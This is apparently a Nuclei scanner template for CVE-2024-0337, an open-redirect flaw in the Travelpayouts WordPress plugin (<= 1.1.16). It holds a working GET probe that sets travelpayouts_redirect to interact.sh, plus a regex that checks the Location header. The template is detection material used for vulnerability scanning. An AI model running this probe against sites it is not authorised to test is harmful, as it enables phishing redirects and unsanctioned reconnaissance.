24 lines
877 B
YAML
24 lines
877 B
YAML
|
id: CVE-2024-0337
|
||
|
info:
|
||
|
name: Travelpayouts <= 1.1.16 - Open Redirect
|
||
|
author: Kazgangap
|
||
|
severity: medium
|
||
|
description: |
|
||
|
The plugin is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
|
||
|
reference:
|
||
|
- https://wpscan.com/vulnerability/2f17a274-8676-4f4e-989f-436030527890/
|
||
|
classification:
|
||
|
epss-score: 0.00043
|
||
|
epss-percentile: 0.07895
|
||
|
tags: wpscan,cve2024,wordpress,redirect
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/?travelpayouts_redirect=https://interact.sh"
|
||
|
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
part: header
|
||
|
regex:
|
||
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|